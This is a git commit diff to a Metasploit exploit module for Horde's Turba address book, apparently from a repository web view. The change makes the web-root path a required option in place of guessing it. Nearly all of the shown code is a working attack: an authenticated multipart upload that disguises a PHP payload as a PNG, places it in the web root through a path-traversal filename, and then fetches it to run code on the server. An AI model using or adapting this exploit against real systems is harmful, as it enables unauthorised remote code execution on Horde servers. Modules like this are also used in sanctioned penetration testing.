Remove web root guessing since not reliable
parent
f8c5852902
commit
5c84e9e61a
|
@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
||||||
OptString.new('USERNAME', [true, 'The username to authenticate with']),
|
OptString.new('USERNAME', [true, 'The username to authenticate with']),
|
||||||
OptString.new('PASSWORD', [true, 'The password to authenticate with']),
|
OptString.new('PASSWORD', [true, 'The password to authenticate with']),
|
||||||
OptString.new('WEB_ROOT', [false, 'Path to the web root'])
|
OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www/html'])
|
||||||
|
# Appears to be '/usr/share/horde/' if installed with apt
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -116,54 +117,37 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
|
vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
|
||||||
|
|
||||||
if not webroot
|
payload_name = Rex::Text.rand_text_alpha_lower(10..12)
|
||||||
webroot_paths = [
|
payload_path = File.join(webroot, "static", "#{payload_name}.php")
|
||||||
'/var/www/html/', # If installed with PEAR
|
payload_path_traversal = File.join("..", payload_path)
|
||||||
'/usr/share/horde/' # If installed with apt
|
|
||||||
]
|
|
||||||
else
|
|
||||||
webroot_paths = [ webroot ]
|
|
||||||
end
|
|
||||||
|
|
||||||
for webroot_path in webroot_paths
|
data = Rex::MIME::Message.new
|
||||||
|
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
|
||||||
|
data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
|
||||||
|
data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
|
||||||
|
data.add_part(source_token, nil, nil, 'form-data; name="source"')
|
||||||
|
data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
|
||||||
|
post_data = data.to_s
|
||||||
|
|
||||||
payload_name = Rex::Text.rand_text_alpha_lower(10..12)
|
print_status("Uploading payload to #{payload_path_traversal}")
|
||||||
payload_path = File.join(webroot_path, "static", "#{payload_name}.php")
|
res = send_request_cgi(
|
||||||
payload_path_traversal = File.join("..", payload_path)
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri, 'turba', 'add.php'),
|
||||||
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||||
|
'data' => post_data,
|
||||||
|
'cookie' => cookie + ' ' + secret_cookie
|
||||||
|
)
|
||||||
|
|
||||||
data = Rex::MIME::Message.new
|
fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
|
||||||
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
|
|
||||||
data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
|
|
||||||
data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
|
|
||||||
data.add_part(source_token, nil, nil, 'form-data; name="source"')
|
|
||||||
data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
|
|
||||||
post_data = data.to_s
|
|
||||||
|
|
||||||
print_status("Uploading payload to #{payload_path_traversal}")
|
payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
|
||||||
res = send_request_cgi(
|
|
||||||
'method' => 'POST',
|
|
||||||
'uri' => normalize_uri(target_uri, 'turba', 'add.php'),
|
|
||||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
||||||
'data' => post_data,
|
|
||||||
'cookie' => cookie + ' ' + secret_cookie
|
|
||||||
)
|
|
||||||
|
|
||||||
fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
|
vprint_status("Executing the payload at #{payload_url}.")
|
||||||
|
res = send_request_cgi(
|
||||||
payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
|
|
||||||
|
|
||||||
vprint_status("Executing the payload at #{payload_url}.")
|
|
||||||
res = send_request_cgi(
|
|
||||||
'uri' => payload_url,
|
'uri' => payload_url,
|
||||||
'method' => 'GET'
|
'method' => 'GET',
|
||||||
)
|
)
|
||||||
|
|
||||||
if res and res.code == 200
|
register_files_for_cleanup(payload_path)
|
||||||
register_files_for_cleanup(payload_path)
|
|
||||||
break
|
|
||||||
else
|
|
||||||
vprint_bad("URL #{payload_url} hasn't been created or is not callable")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue